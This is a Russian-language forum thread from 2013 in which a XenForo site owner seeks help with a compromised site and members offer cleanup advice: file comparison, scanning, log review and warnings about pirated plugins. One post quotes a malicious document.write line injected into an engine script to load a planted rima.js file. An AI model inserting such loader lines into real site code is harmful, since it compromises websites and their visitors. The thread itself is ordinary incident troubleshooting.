1. Приветствуем Вас на неофициальном форуме технической поддержки XenForo на русском языке. XenForo - коммерческий форумный движок от бывших создателей vBulletin, написанный на PHP.

1.2.x а не вирус ли это?

Тема в разделе "Основные вопросы по XenForo", создана пользователем lifeact, 03.12.2013.

Загрузка
  1. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    Всем привет!

    Сегодня совершенно самостоятельно появился файл - /forum/install/data/cartman.js

    его содержимое - http://joxi.ru/Pf-dUtg5CbDyUBY5Og0

    походу шел какой то

    я в секурити новичок, что делать?
     
  2. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    ребят никто не знает? Есть ли какие то скрипты или сервисы чтобы проверить форум на наличие шелов или вирусов
     
  3. Kolya groza morey

    Kolya groza morey Местный

    Регистрация:
    14.06.13
    Сообщения:
    366
    Симпатии:
    118
    Версия XF:
    1.5.9
    А зачем вы храните папку install на сервере?
     
    lifeact нравится это.
  4. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    если нужно удалить, удалю
     
  5. lepagrn

    lepagrn Местный

    Регистрация:
    06.03.13
    Сообщения:
    62
    Симпатии:
    23
    Версия XF:
    1.2.5
    проще тогда сравнить файлы установленного форума с оригиналом.
     
    lifeact нравится это.
  6. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    да, сейчас делаю это
     
  7. Oleg-2012

    Oleg-2012 Местный

    Регистрация:
    21.04.12
    Сообщения:
    700
    Симпатии:
    297
    http://antivirus-alarm.ru/

    https://www.virustotal.com/#url

    Также скачайте сайт к себе на комп и проверьте штатным антивирусом !

    Ну и можете отослать подозрительный скрипт /forum/install/data/cartman.js в антивирусную лабораторию своего антивируса, анализ сделают бесплатно, особенно если антивирусник купленный ! ;)
     
    Mirovinger и lifeact нравится это.
  8. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    спасибо, проверка это уже пройденный этап.... на сайте постоянно появляются новые *.js и *.swf с разными именами в разных местах, уже все файлы прошерстил на наличие шела Eval(.... Base64_Decode и нифига, мозг уже вынес себе (((((((
     
  9. Oleg-2012

    Oleg-2012 Местный

    Регистрация:
    21.04.12
    Сообщения:
    700
    Симпатии:
    297
    Попробуйте поменять все пароли, особенно ftp и SSH !

    У Вас VPS ?

    Если нет, то обратитесь к хостеру ! Даже если VPS, тоже напишите в тех. поддержку, может что посоветуют...
     
    lifeact нравится это.
  10. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    пароли все первым делом сменил. недавно опять сменил, даже на БД.

    К сожалению не VPS. Хостер сказал это не его дело искать вирусы и когда с сайта начнется литься спам или типа того, мне вырубят сайт.
     
  11. Oleg-2012

    Oleg-2012 Местный

    Регистрация:
    21.04.12
    Сообщения:
    700
    Симпатии:
    297
    Меняйте таких хостеров, в их интересах разобраться, вдруг у них дыра на сервере, когда такой ответ лучше сразу переизжать к более адекватным людям, благо выбор есть, сейчас хостеров как гуталина !:)
     
    Mirovinger и lifeact нравится это.
  12. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    Меняйте таких хостеров
    ---
    согласен, но это дело второе, с завирусованым сайтом не переедешь
     
  13. infis

    infis Местный

    Регистрация:
    27.06.11
    Сообщения:
    5 966
    Симпатии:
    3 548
    Версия XF:
    1.5.9
    Посмотрите логи веб-сервера: кто и когда обращался к подозрительным файлам, какие были конкретно запросы с таких IP адресов и т.д.
    --- добавлено : 4 дек 2013 в 15:18 ---
    Ну на самом деле хостер совсем не обязан заниматься безопасностью клиентов, если это не угрожает другим клиентам, а также и самому хостеру. Все же нужно различать проблемы с безопасностью по вине хостера и по вине клиента. Так что не надо так категорично.
    Конечно в качестве жеста доброй воли хостер может помочь, но он этого делать не обязан.
     
    Последнее редактирование модератором: 12.12.2013
    Oleg-2012, Kolya groza morey и lifeact нравится это.
  14. Oleg-2012

    Oleg-2012 Местный

    Регистрация:
    21.04.12
    Сообщения:
    700
    Симпатии:
    297
    Согласен с Вами, вот только как определить кто виноват в данной ситуации ?

    А из слов lifeact они даже не попытались разобраться, если у них уязвимость на сервере, то эти скрипты и будут появляться у пользователей и бесполезно их удалять, а многие пользователи и знать не будут, что сайт заражён в частности и сам хостер...

    К тому-же лично я не исключаю вариант, что и сам хостер может заливать эти скрипты, особенно если это какой бесплатный хостинг, либо почти бесплатный !:cool:
     
  15. lifeact

    lifeact Активный пользователь

    Регистрация:
    27.05.13
    Сообщения:
    61
    Симпатии:
    1
    Версия XF:
    1.1.3
    продвигаюсь:

    в одном из скриптов движка увидел дописанную в конце строку:

    ;document.write("<scr"+"ipt src='/forum/library/XenForo/rima.js'><"+"/script>");
     
  16. martyanov12

    martyanov12 Местный

    Регистрация:
    24.11.12
    Сообщения:
    248
    Симпатии:
    58
    Версия XF:
    1.3.2
    Есть еще один вариант, но оооочень маловероятный.
    Иногда моя пиратская сущность лезет наружу, и я иду на ыьетнамские сайты качать "нуленые" плагины. Так вот. Было дело с User Essentials - был в установщике файл (обфусцированый PHP). Сервер морать было жалко, открыл на ноутбуке с локального вебсервера. В итоге получил в древе процессов постоянно подвешенный скрипт, через каждые 3600 секунд кладущий в рандомное (или нет) место некие файлы. JS, PHP, HTML, SQL. К утру вебсервер едва работал, а локальный сайт пестрил цветастой рекламой (ЩО).
    Мораль сей басни такова - проверять плагины и стили надо. Особенно нуленые. Хотя-бы на подобные обфусцированные "нечитабельные в трезвом состоянии людьми" файлы. И проверять работу плагинов локально. И не качать напрямую с вьетнамских сайтов, в конце концов =)

    Отправлено из моего One S с помощью Tapatalk
     
    Oleg-2012, infis и Mirovinger нравится это.

Поделиться этой страницей